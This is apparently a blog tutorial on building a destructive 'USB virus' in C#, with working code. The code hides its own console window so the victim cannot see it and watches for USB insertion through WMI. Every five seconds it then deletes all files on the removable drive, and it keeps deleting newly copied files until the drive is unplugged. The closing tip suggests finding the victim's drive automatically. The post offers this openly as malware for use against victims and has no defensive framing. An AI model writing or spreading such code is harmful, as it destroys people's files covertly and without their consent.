.jpg)
Introduction
To Code A USB virus is simple as one can think.There are USB Viruses Evolving Today we will some mischievous one here.
What Does It Do ?
When a USB Storage device is plugged in to the target victim's system the virus catches by sensing it and penetrate in to the storage device and delete's permanently all the containing files .
It also continuously sense for a new file that is copied in the device and also delete it until the device is unplugged from the victims system.
Coding:
1. first we should add reference of management to our console project.see the below pictorial explanation
- Create a console application and name it
- When the project opens view the solution explorer if solution explorer is not displayed then click view in the window and select view solution explorer.it will be displayed.
- right click in the reference and click the add reference
- the add reference window opens
- in the .Net tab select system.Management and click ok as shown in the picture below
- After the addition of reference we must include it in our project as like that shown below
2. we should hide our console window from showing itself so victim cannot see it for doing this we have to import below shown
- add this in your program
[DllImport("kernel32.dll")]
private static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
private static extern bool ShowWindow(IntPtr hwnd, int ncmdshow);
const int SW_HIDE = 0;
- After adding above in the main area of your program initialize a variable of type var to get the console window
- call the showwindow() method that will define how to hide the window by parameter SW_HIDE as shown below
static void Main(string[] args)
{
var Handle = GetConsoleWindow();
ShowWindow(Handle,SW_HIDE);
InsertUSBHandler();
RemoveUSBHandler();
while (true)
{
}
}
3. Create two methods that create two handlers for usb insertion and usb removal as shown below
And declare the ManagementEventWatcher in the class.
static ManagementEventWatcher w = null; - shows insert usb handler that handles insertion of the device
- when the usb device is inserted event triggered it calls method USBInserted
static void InsertUSBHandler()
{
WqlEventQuery q;
ManagementScope scope = new ManagementScope("root\\CIMV2");
scope.Options.EnablePrivileges = true;
try {
q = new WqlEventQuery();
q.EventClassName = "__InstanceCreationEvent";
q.WithinInterval = new TimeSpan(0, 0, 3);
q.Condition = "TargetInstance ISA 'Win32_USBControllerdevice'";
w = new ManagementEventWatcher(scope, q);
w.EventArrived += USBInserted;
w.Start();
}
catch (Exception e) {
Console.WriteLine(e.Message);
if (w != null)
{
w.Stop();
}
}
}
- Inside the USBInserted method create a timer with interval of 5000 milliseconds for doing an action every 5000 ms after the insertion.
- the timer is started .
- when the time elapsed the timer elapsed event triggered and calls tmr_Elapsed method.
- The USBInserted method is shown below
public static void USBInserted(object sender, EventArgs e)
{
System.Timers.Timer tmr = new System.Timers.Timer();
tmr.Interval = 5000;
tmr.Start();
tmr.Elapsed += new ElapsedEventHandler(tmr_Elapsed);
}
- tmr_Elapsed method contains what exactly virus should do that is deleting the files of the device
- for every 5000ms the tmr_Elapsed method is called for deletion code is shown below.
public static void tmr_Elapsed(object sender, ElapsedEventArgs e)
{
\\ this path should be the path of the removable disk of the victim's system
string[] filePaths = Directory.GetFiles(@"E:\","*.*",SearchOption.AllDirectories);
if(filePaths != null)
{
foreach (string filePath in filePaths)
File.Delete(filePath);
}
}
Note: You can also enhance the above method by make it to automatically search the removable directory of the victims system.
No comments:
Post a Comment